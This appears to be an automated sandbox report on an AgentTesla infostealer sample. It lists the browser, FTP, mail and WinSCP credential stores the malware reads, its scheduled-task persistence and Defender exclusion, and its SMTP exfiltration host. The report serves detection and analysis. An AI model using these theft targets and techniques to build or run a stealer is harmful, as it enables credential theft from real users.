          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 0.2.file.exe.4099970.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.4176818.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.4099970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.40d9f78.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.4176818.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 8144, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NnXVkDOvj.exe PID: 2832, type: MEMORYSTR
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\FTP Navigator\Ftplist.txt
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: Yara matchFile source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 8144, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NnXVkDOvj.exe PID: 2832, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 0.2.file.exe.4099970.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.4176818.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.4099970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.40d9f78.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.4176818.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 8144, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NnXVkDOvj.exe PID: 2832, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Disable or Modify Tools          		2
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services11
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		111
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		11
          Input Capture          		24
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Scheduled Task/Job          		2
          Obfuscated Files or Information          		1
          Credentials in Registry          		211
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
          Software Packing          		NTDS1
          Process Discovery          		Distributed Component Object Model11
          Input Capture          		11
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets141
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Fallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
          Virtualization/Sandbox Evasion          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571207 Sample: file.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 44 smtp.yandex.ru 2->44 46 smtp.yandex.com 2->46 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Sigma detected: Scheduled temp file as task from temp location 2->54 56 8 other signatures 2->56 8 file.exe 7 2->8         started        12 NnXVkDOvj.exe 2->12         started        signatures3 process4 file5 36 C:\Users\user\AppData\Roaming36nXVkDOvj.exe, PE32 8->36 dropped 38 C:\Users\...38nXVkDOvj.exe:Zone.Identifier, ASCII 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpD1A2.tmp, XML 8->40 dropped 42 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 8->42 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->58 60 Uses schtasks.exe or at.exe to add and modify task schedules 8->60 62 Adds a directory exclusion to Windows Defender 8->62 14 file.exe 7 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 22 8->20         started        26 3 other processes 8->26 64 Multi AV Scanner detection for dropped file 12->64 66 Machine Learning detection for dropped file 12->66 68 Injects a PE file into a foreign processes 12->68 22 NnXVkDOvj.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 48 smtp.yandex.ru 77.88.21.158, 49925, 49938, 49944 YANDEXRU Russian Federation 14->48 70 Installs a global keyboard hook 14->70 72 Loading BitLocker PowerShell Module 18->72 28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->74 76 Tries to steal Mail credentials (via file / registry access) 22->76 78 Tries to harvest and steal ftp login credentials 22->78 80 Tries to harvest and steal browser information (history, passwords, etc) 22->80 32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        signatures9 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe29%ReversingLabsByteCode-MSIL.Infostealer.Pony
          file.exe40%VirustotalBrowse
          file.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\NnXVkDOvj.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\NnXVkDOvj.exe29%ReversingLabsByteCode-MSIL.Infostealer.Pony

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://vMOWVB.com0%Avira URL Cloudsafe
          http://crl.glym0%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          https://api.ipify.org%40%Avira URL Cloudsafe
          https://api.ipify.org%GETMozilla/5.00%Avira URL Cloudsafe
          https://2QFl69OCGPGUgwM.org0%Avira URL Cloudsafe
          http://crl.globalsigo0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.o0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          smtp.yandex.ru
          		77.88.21.158
          		truefalse
            		high
            s-part-0035.t-0009.t-msedge.net
            		13.107.246.63
            		truefalse
              		high
              smtp.yandex.com
              		unknown
              		unknownfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1file.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://DynDns.comDynDNSNnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hafile.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.glNnXVkDOvj.exe, 00000010.00000002.3834580704.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834926074.0000000006126000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://crl.glymfile.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://vMOWVB.comNnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org%4file.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org%GETMozilla/5.0NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://2QFl69OCGPGUgwM.orgfile.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.globalsigoNnXVkDOvj.exe, 00000010.00000002.3834580704.0000000006104000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.theonionrouter.com/dist.torproject.ofile.exe, 0000000C.00000002.3811121653.0000000000436000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 0000000D.00000002.1452237670.0000000003230000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipfile.exe, 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://smtp.yandex.comfile.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002D5B000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      77.88.21.158
                      		smtp.yandex.ruRussian Federation
                      		13238YANDEXRUfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1571207
                      Start date and time:2024-12-09 06:58:36 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 25s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@22/17@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 95%
                      • Number of executed functions: 272
                      • Number of non-executed functions: 9
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      00:59:28API Interceptor7256958x Sleep call for process: file.exe modified
                      00:59:30API Interceptor26x Sleep call for process: powershell.exe modified
                      00:59:36API Interceptor5141747x Sleep call for process: NnXVkDOvj.exe modified
                      05:59:35Task SchedulerRun new task: NnXVkDOvj path: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      77.88.21.158REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                          e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                            DHL Delivery Invoice.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                              DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                  datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                    datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                      0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                        BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
